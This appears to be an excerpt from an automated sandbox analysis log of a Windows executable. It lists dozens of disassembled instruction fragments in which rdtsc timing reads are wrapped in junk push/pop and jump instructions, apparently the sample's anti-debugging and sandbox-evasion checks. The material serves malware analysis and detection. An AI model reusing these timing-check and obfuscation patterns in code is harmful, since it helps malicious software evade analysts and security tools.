                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA36C second address: 5EA3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F909C7BD306h 0x0000000a popad 0x0000000b jmp 00007F909C7BD318h 0x00000010 popad 0x00000011 nop 0x00000012 mov ecx, dword ptr [ebp+122D3634h] 0x00000018 lea eax, dword ptr [ebp+12483E1Dh] 0x0000001e mov dword ptr [ebp+122D24E2h], ebx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 push edi 0x00000028 jmp 00007F909C7BD30Ah 0x0000002d pop edi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA3B2 second address: 5EA3B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA3B9 second address: 5EA3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5EA3C5 second address: 5D4135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909CBB3516h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F909CBB3518h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2D77h], eax 0x00000033 call dword ptr [ebp+122D1E7Ah] 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d pop esi 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62CB57 second address: 62CB73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F909C7BD306h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F909C7BD30Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62CE0F second address: 62CE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62CE14 second address: 62CE1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62CE1C second address: 62CE20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62CE20 second address: 62CE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F909C7BD30Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e ja 00007F909C7BD319h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F909C7BD311h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62D0CC second address: 62D0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62D0D4 second address: 62D0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62D0D8 second address: 62D0DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 62D0DC second address: 62D102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD30Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F909C7BD30Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 631B0B second address: 631B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 631B17 second address: 631B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Ch 0x00000007 jmp 00007F909C7BD30Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F909C7BD30Dh 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 634A79 second address: 634AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jmp 00007F909CBB3527h 0x0000000e js 00007F909CBB3516h 0x00000014 pop ebx 0x00000015 jmp 00007F909CBB3525h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6343B1 second address: 6343CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F909C7BD30Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 59FA9D second address: 59FAA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 636B46 second address: 636B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 636B4C second address: 636B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 636B52 second address: 636B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 636CC2 second address: 636CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 636CC6 second address: 636CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 59DE97 second address: 59DE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 63AEC5 second address: 63AED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F909C7BD306h 0x00000009 jl 00007F909C7BD306h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 63AED6 second address: 63AEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 63AEDC second address: 63AEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 63B034 second address: 63B053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3528h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 63B053 second address: 63B074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F909C7BD30Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64126A second address: 641270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 641270 second address: 641278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 63FD1B second address: 63FD29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 59DED9 second address: 59DEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 640101 second address: 640105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 640105 second address: 640111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E9DDA second address: 5E9DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5E9F61 second address: 5E9FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F909C7BD319h 0x0000000d push 0000001Eh 0x0000000f add edi, 697F740Fh 0x00000015 add ecx, dword ptr [ebp+122D3568h] 0x0000001b nop 0x0000001c jmp 00007F909C7BD313h 0x00000021 push eax 0x00000022 pushad 0x00000023 jnp 00007F909C7BD308h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 640FEA second address: 640FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 640FF3 second address: 640FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F909C7BD306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64458B second address: 644590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 644B5C second address: 644B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 644CAB second address: 644CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F909CBB351Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 644CBC second address: 644CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a popad 0x0000000b jmp 00007F909C7BD310h 0x00000010 pushad 0x00000011 jbe 00007F909C7BD306h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 644CE0 second address: 644CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64D527 second address: 64D53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD312h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64B633 second address: 64B63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64B8FB second address: 64B903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64B903 second address: 64B907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64D28E second address: 64D297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64D297 second address: 64D2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007F909CBB3516h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 651620 second address: 651635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F909C7BD306h 0x0000000f jl 00007F909C7BD306h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65068D second address: 6506A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F909CBB3521h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6506A5 second address: 6506AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650812 second address: 65081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65081C second address: 650822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650822 second address: 650828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650970 second address: 65097E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65097E second address: 6509A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F909CBB3516h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B33 second address: 650B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B39 second address: 650B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B3F second address: 650B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B43 second address: 650B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650C82 second address: 650C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650C86 second address: 650C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F909CBB3516h 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650C99 second address: 650CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650CA2 second address: 650CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650CA6 second address: 650CCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD313h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F909C7BD306h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650F8F second address: 650F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6510EC second address: 6510F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6510F0 second address: 651120 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F909CBB351Ch 0x00000011 jns 00007F909CBB351Ch 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F909CBB3516h 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 651120 second address: 65114E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD311h 0x00000007 jmp 00007F909C7BD316h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6512CA second address: 6512D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 655FCF second address: 655FD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 655FD5 second address: 655FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F909CBB3516h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 655FE4 second address: 656000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F909C7BD311h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 656000 second address: 656004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C09A second address: 65C0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD30Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C0AA second address: 65C0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F909CBB3526h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C4A4 second address: 65C4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C4A8 second address: 65C4B4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F909CBB3516h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C776 second address: 65C77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C77C second address: 65C780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65CA64 second address: 65CA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F909C7BD313h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65CA81 second address: 65CAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 jl 00007F909CBB3538h 0x0000000c jmp 00007F909CBB351Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F909CBB351Ch 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65CBF8 second address: 65CC02 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65DB9E second address: 65DBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F909CBB3526h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65DBC5 second address: 65DBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65DBCA second address: 65DBDB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F909CBB351Ch 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA35 second address: 65BA41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA41 second address: 65BA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA4B second address: 65BA55 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F909C7BD306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
